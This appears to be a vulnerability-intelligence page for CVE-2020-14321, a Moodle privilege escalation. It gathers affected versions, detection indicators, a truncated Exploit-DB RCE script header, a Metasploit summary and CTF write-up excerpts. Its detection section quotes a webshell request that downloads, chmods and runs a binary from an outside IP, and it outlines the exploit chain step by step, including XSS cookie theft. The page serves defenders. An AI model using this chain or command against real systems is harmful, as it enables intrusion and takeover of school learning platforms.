CVE-2020-14321
published 2022-08-16CVE-2020-14321: In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.
PriorityP269high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
16.43%
96.6th percentile
In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| moodle | moodle | — | — |
| moodle | moodle | — | — |
| moodle | moodle | >= 0 < 3.5.13 | 3.5.13 |
| moodle | moodle | >= 3.5.0 < 3.5.13 | 3.5.13 |
| moodle | moodle | >= 3.6.0-beta < 3.7.7 | 3.7.7 |
| moodle | moodle | >= 3.7.0 < 3.7.7 | 3.7.7 |
| moodle | moodle | >= 3.8.0 < 3.8.4 | 3.8.4 |
| moodle | moodle | >= 3.8.0-beta < 3.8.4 | 3.8.4 |
| moodle | moodle | >= 3.9.0-beta < 3.9.1 | 3.9.1 |
Detection & IOCsextracted from sources · hover to see the quote
commandGET /moodle/blocks/rce/lang/en/block_rce.php?cmd=wget+10.10.132.8%3a1234/client+%26%26+chmod+%2bx+client+%26%26+./client+%26 HTTP/1.1↗
- →The exploit chain requires a teacher-authenticated session. Initial access vector is privilege escalation via course enrollment: teacher assigns themselves manager role using /enrol/manual/ajax.php with roletoassign=1. ↗
- →Detect POST/GET requests to /enrol/manual/ajax.php with parameter roletoassign=1 from a teacher-level session, which indicates privilege escalation attempt. ↗
- →Detect access to /course/loginas.php — used by the exploit to impersonate a manager account after privilege escalation. ↗
- →Detect POST to Moodle's role definition endpoint with action=edit&roleid=1 and a large capability list — this is the manager role modification step that enables plugin installation. ↗
- →Detect HTTP requests to /blocks/rce/lang/en/block_rce.php with a cmd= query parameter — this is the webshell dropped by the malicious plugin. ↗
- →XSS payload injected into MoodleNet Profile field to steal teacher session cookies; monitor for script tags or Image() src exfiltration patterns in profile update requests. ↗
- →The exploit requires a Referer header matching the Moodle base URL; requests lacking a Referer header are rejected by some configurations. Detection should account for exploit scripts that add Referer headers. ↗
- →Post-exploitation: attacker uploads a malicious plugin (rce.zip / block_rce) via Moodle's plugin install interface. Monitor for zip file uploads to Moodle admin plugin install endpoint followed by new PHP files appearing under /blocks/. ↗
- ·The exploit requires the attacker to already have a teacher-level authenticated session (credentials or valid MoodleSession cookie). Unauthenticated exploitation is not possible. ↗
- ·The exploit depends on a manager user existing in the course or being enrollable; the attacker must know or discover the manager's user ID (default assumed 25 in the PoC). ↗
- ·Affected Moodle versions: 3.9 (before 3.9.1), 3.8 to 3.8.3, 3.7 to 3.7.6, 3.5 to 3.5.12 and earlier unsupported versions. ↗
- ·The Metasploit module notes that manual cleanup is required after exploitation: enrolled students added to the course during the attack are not automatically removed. ↗
- ·The PoC script is sensitive to Moodle state; prior enumeration or interaction with the Moodle instance can break the exploit flow. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
osv8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Moodle Incorrect Authorization vulnerability
ghsa·2022-08-17
CVE-2020-14321 [HIGH] CWE-863 Moodle Incorrect Authorization vulnerability
Moodle Incorrect Authorization vulnerability
In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.
OSV
Moodle Incorrect Authorization vulnerability
osv·2022-08-17
CVE-2020-14321 [HIGH] Moodle Incorrect Authorization vulnerability
Moodle Incorrect Authorization vulnerability
In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.
OSV
CVE-2020-14321: In Moodle before 3
osv·2022-08-16·CVSS 8.8
CVE-2020-14321 [HIGH] CVE-2020-14321: In Moodle before 3
In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.
No detection rules found.
Exploit-DB
Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)
exploitdb·2021-08-05·CVSS 8.8
CVE-2020-14321 [HIGH] Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)
Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)
---
# Exploit Title: Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 12-05-2021
# Exploit Author: lanz
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.9
# Tested on: FreeBSD
#!/usr/bin/python3
## Moodle 3.9 - RCE (Authenticated as teacher)
## Based on PoC and Payload to assign full permissions to manager rol:
## * https://github.com/HoangKien1020/CVE-2020-14321
## Repository: https://github.com/lanzt/CVE-2020-14321/blob/main/CVE-2020-14321_RCE.py
import string, random
import requests, re
import argparse
import base64
import signal
import time
from pwn import *
class Color:
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
END = '\033[0m'
def def_handler(sig, frame):
print(Co
Metasploit
Moodle Teacher Enrollment Privilege Escalation to RCE
metasploit
Moodle Teacher Enrollment Privilege Escalation to RCE
Moodle Teacher Enrollment Privilege Escalation to RCE
Moodle version 3.9, 3.8 to 3.8.3, 3.7 to 3.7.6, 3.5 to 3.5.12 and earlier unsupported versions allow for a teacher to exploit chain to RCE. A bug in the privileges system allows a teacher to add themselves as a manager to their own class. They can then add any other users, and thus look to add someone with manager privileges on the system (not just the class). After adding a system manager, a 'loginas' feature is used to access their account. Next the system is reconfigured to allow for all users to install an addon/plugin. Then a malicious theme is uploaded and creates an RCE. If all of that is a success, we revert permissions for managers to system default and remove our malicoius theme. Manual cleanup to remove students from the cla
CTF
tryhackme-rooms / plottedlms
ctf_writeups·CVSS 8.8
[HIGH] tryhackme-rooms / plottedlms
# Plotted LMS
A fairly hard room, largely due to the breadth of the enumeration and its numerous rabbit holes, plus some instability mixed with dickery in the foothold path.
1. A rust scan reveals four websites, 80, 873, 8820 and 9020. All show a default apache page
2. Using ffuf with directory wordlist medium on each, it reveals three sites: :873/rail, :8820/learn and :9020/moodle. The first two look to be custom built, but the last is a regular moodle instance.
3. Running moodlescan against the moodle url, reveals it is version 3.9 beta. This version is vulnerable to CVE-2020-14321, a authenticated remote code execution vulnerability.
4. The vuln requires the creds or cookie of a 'teacher'. Fortunately the site allows registeration, so I register a `test123:Test-123` user. Furthermore,
CTF
Schooled / README
ctf_writeups·CVSS 8.8
CVE-2020-14321 [HIGH] Schooled / README
# Schooled - HackTheBox
FreeBSD, 30 Base Points, Medium
## Machine
## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```80``` and ```22```.
***User***: Register to Moodle system, Inject [XSS](https://owasp.org/www-community/attacks/xss/) payload into ```MoodleNet Profile``` field to get the teacher cookies, Using [CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321) to install a plugin which leads to a shell, Found DB credentials on ```/usr/local/www/apache24/data/moodle/config.php``` file, On DB we found hashed password of ```jamie``` user.
***Root***: By running ```sudo -l``` we can see we have permission to install FreeBSD packages as root (```(ALL) NOPASSWD: /usr/sbin/pkg install``` , Create a custom package and ins
2022-08-16
Published